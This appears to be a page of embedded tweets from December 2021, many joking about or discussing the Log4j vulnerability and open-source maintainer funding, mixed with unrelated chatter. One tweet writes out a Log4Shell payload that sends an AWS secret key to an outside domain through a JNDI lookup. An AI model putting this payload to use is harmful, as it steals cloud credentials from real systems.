I'll just leave this right here: whoownsyoursoftwaresupplychain.com
J. Paul Reed (@jpaulreed)Sat, 11 Dec 2021 21:16 GMT
Isn't credit card required for reducing risk of abuse though? I agree it's a barrier but wonder if there's something that can be done to improve both sides
Local dev a first class consideration (long way to go now) along with IaC (getting better but still often afterthought).
Brian LeRoux (@brianleroux)Sun, 12 Dec 2021 15:15 GMT
If AWS were rebuilt today, what high-level incidental complexity do you wish would be eliminated via different design decisions? E.g. issues with ARNs or URL structure, or even ‘I want regions for data sovereignty, not resiliency.’ Bonus for examples creating toil inside AWS.
Zack Kanter (@zackkanter)Sun, 12 Dec 2021 13:44 GMT
They took 2 pounds of weed 2 hand guns and $70 (SEVENTY!!!) off the street and posing like they just took down Pablo Escobar 😂😂😂😂😂😂😂😂😂😂
The Negromancer (@kokujin37)Sat, 11 Dec 2021 21:29 GMT
There’s not a single line in “Santa claus is coming to town” that makes it sound like a good thing. If it wasn’t for the jaunty tune I’d interpret it the same way as a warning the 4 horsemen of the apocalypse were arriving.
Andrew Nadeau (@TheAndrewNadeau)Mon, 13 Dec 2021 04:21 GMT
there are literal generations of coders who know that RMS is a creep but have no idea what the FSF does, or know that GNU/Linux is a meme but not why they are supposed to have ever cared
Ian Coldwater 📦💥 (@IanColdwater)Mon, 13 Dec 2021 01:35 GMT
Open source is free as in puppy.
Laurie Voss (@seldo)Sun, 12 Dec 2021 16:26 GMT
you want me to make a decision? the thing that killed chidi anagonye?
salwa (@evermorevan)Sun, 12 Dec 2021 18:26 GMT
I read once that people who live alongside orangutans have a belief/legend that orangutans can actually speak, but they refuse to because humans would put them to work if they knew. I think about that a lot.
i bless the rains down in castamere (@Chinchillazllla)Sun, 12 Dec 2021 16:27 GMT
You literally have a castle and you spend your time doing this
Rob (@robrousseau)Mon, 13 Dec 2021 01:47 GMT
JK Rowling trying to make trans women out to be rapists is a new low. It’s part of the TERF tactics and it goes to show how far down the transphobia rabbit hole she’s gone. Trans women are not rapists. Trans women are women, who just want a chance to live like any other woman.
Erin, Trail Mom (@ErinInTheMorn)Mon, 13 Dec 2021 00:17 GMT
It’s striking that J.K.Rowling only has the energy to speak out about sexual assault when it’s in service of a spurious moral panic around trans people. At the end of the day, you do just have to conclude that she’s a common garden reactionary.
Scrooge McDuck 📕 (@amphitryoniades)Sun, 12 Dec 2021 23:15 GMT
jk rowling is a bad person w/ bad politics, a childish understanding of feminism and a truly ugly spirit. it’s embarrassing to look at her tweets. it’s upsetting to watch her harm marginalized people. it’s infuriating to me as a feminist, as an assault survivor and as a woman.
jourdain searles (@judysquirrels)Mon, 13 Dec 2021 07:09 GMT
Matt, Mike and Phil get back together after a wild summer vacay of drinks, sand, trees and getting hit by a car while out on a bike. We catch up with Phil and Stoplight's efforts to reshape API Documentation as well as responsible OSS Community Involvement.
Omg stop they’ve made 1 tweet
Adam (@adamrbrts)Mon, 13 Dec 2021 10:06 GMT
A rare insightful comment on the orange site: news.ycombinator.com/item?id=295252… "Open source is not broken".
Danack (@MrDanack)Sun, 12 Dec 2021 22:11 GMT
The eruption of The Fagradalsfjall volcano, Iceland. Photo by Arnar Kristjansson
Diane Doniol-Valcroze (@ddoniolvalcroze)Sun, 12 Dec 2021 17:07 GMT
To everyone astonished at how wide-spread Java usage really is: what you've just seen is just the stuff using Log4J2. ;)
Lars Rosenquist (@larsrosenquist)Sun, 12 Dec 2021 11:24 GMT
don't forget you can get those sweet environment variables ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}
DilDog (@dildog)Sat, 11 Dec 2021 21:48 GMT
A whole lot of engineers worked all weekend and deserve the week off. Friendly reminder that you should give it to them.
emily freeman (@editingemily)Mon, 13 Dec 2021 06:06 GMT
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
Matthew Prince 🌥 (@eastdakota)Sat, 11 Dec 2021 22:47 GMT
I’ve tried very hard to find out who made this but it sadly just pops up on Imgur without any credits. So, with that disclaimer made, I desperately need people to know that I *love* this.
Charble Garble 🏳️🌈🇸🇪 (@charlottegore)Sat, 11 Dec 2021 21:39 GMT
Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time. Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏
Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT
Something I do every December is clear out my Pocket queue and YouTube watch later list. I spend a lot of time reading all the articles I’ve been putting off or I delete them. It feels so nice starting a new year with no backlog. Highly recommend 🤘
Justin Garrison (@rothgar)Mon, 13 Dec 2021 06:23 GMT
Please tell me I'm not the only one who sees it. 😭 You see it, right? RIGHT?
Marjorie🧁 (@NotLargeMarge1)Thu, 09 Dec 2021 22:35 GMT
uh they absolutely do
Luke Plunkett (@LukePlunkett)Sun, 12 Dec 2021 20:38 GMT
This Christmas we're burning Yule Log4js
Richard Westmoreland (@RSWestmoreland)Fri, 10 Dec 2021 21:18 GMT
Real talk: Garak was such a great combination of character & actor that he almost transcended the show & even Star Trek itself. They basically put an ambiguously gay John le Carré antihero into the middle of a space opera.
I'm dead.
MTN DEW: Spider Juice (@MtnDewJitsu)Sun, 12 Dec 2021 13:42 GMT
Zack Stentz (@MuseZack)Mon, 13 Dec 2021 02:23 GMT
Between and I took 8218 steps.
Interviewer: Can you explain the gap in your CV? Me: I spent 6 hours formatting it in Google Docs and you've opened it in Word.
Clarissa Maycock (@ClarissaDM)Fri, 03 Sep 2021 10:40 +0000
We don’t need everyone to upgrade log4j, just enough for herd immunity to take over
Ricky (@rickhanlonii)Sun, 12 Dec 2021 16:55 GMT
Pretty much every day for the last 10 years.
Dio Rettori (@rettori)Sat, 11 Dec 2021 20:58 GMT
Joining a union is a good idea anyway. So you should do that. I'm a member of @ProspectUnion. Who are best choice of the well established unions in the UK if you work in tech.
We all join a union who uses the subs to pay maintainers (how we decide what needs maintaining becomes an issue)
bob (@rjw1)Sun, 12 Dec 2021 21:10 GMT
bob (@rjw1)Sun, 12 Dec 2021 21:44 GMT
Log4j recap
- two random unpaid folk maintain the code
- a random requested the vuln/feature in 2013
- major IT and security vendors rely on that code
- problem was publicised by teens in Minecraft video game
- scope of problem still unclear days later
Kevin Beaumont (@GossiTheDog)Sun, 12 Dec 2021 01:14 GMT
Week Notes 21#49 (4 mins read).
What happened in the week of 2021-12-06?
my friend told me halfway through giving birth she was like “I can’t do this, I simply cannot do this?” and they were like “oh you have to” and life is just like that all the time
SANDWORM (@christapeterso)Fri, 10 Dec 2021 09:30 GMT
Sorry, yeah - when I interact with anything that's public (ie public Twitter accounts) then things are embedded for folks viewing my site to see context for interactions
The festive season is treating Terry’s chocolate orange as one of your five-a-day
Rebekah (@rkulidzan)Sun, 12 Dec 2021 13:22 GMT
FLIRT LIZARD GONNA GET SOME HOLODICK
Katie (@ZiziFothSi)Sun, 12 Dec 2021 11:38 GMT
My #log4j status/tracking page is a little rough in spots, but the list of affected, claimed unaffected, and not-sure-yet products is getting the full undue diligence: techsolvency.com/story-so-far/c…
Royce Williams (@TychoTithonus)Sat, 11 Dec 2021 06:21 GMT
Consciously identifying that I have been talking solo for far too long at the zoom call but I have no idea how to wind this down so I just shout HAHA THAYS IT LIKE COMMENT AND SUBSCRIBE and throw my work laptop out of the window
laura with the red nose and the antlers (@freezydorito)Sun, 12 Dec 2021 11:48 GMT
Another chronically underfunded OSS library in the news. It’s simple:
- Using OSS to make money? Fund it!
- Want to see an OSS project advance? Fund it!
- Want to help your dependencies succeed so you can hire people experienced in them? Fund them!
NORMALIZE FUNDING OSS. twitter.com/benjie/status/…
Why not take 5% of your engineering budget and invest it in the various open source projects you depend on? I'd hazard the returns you'd see over the coming years from this investment would be greater than having spent that same amount on payroll.
Benjie 🐘 (@Benjie)Thu, 18 Jun 2020 13:18 +0000
Benjie 🐘 (@Benjie)Sun, 12 Dec 2021 10:05 GMT
If you have a #Maven parent POM for your org or project, here's an enforcer rule to put into it which will ban any current or future usage of vulnerable #log4j2 versions. gist.github.com/gunnarmorling/…
Gunnar Morling 🌍 (@gunnarmorling)Sat, 11 Dec 2021 09:42 GMT
People making fun of log4j as if they never slammed some bash to parse out database credentials for reasons.
Smasher of DBs. First of her name. (@dbsmasher)Sat, 11 Dec 2021 19:19 GMT
You deserve to get jumped
ASHUTOSH #GoGHC #PissariSTRONG 🥶🥶 (@PuroNerdAsh)Sun, 12 Dec 2021 05:49 GMT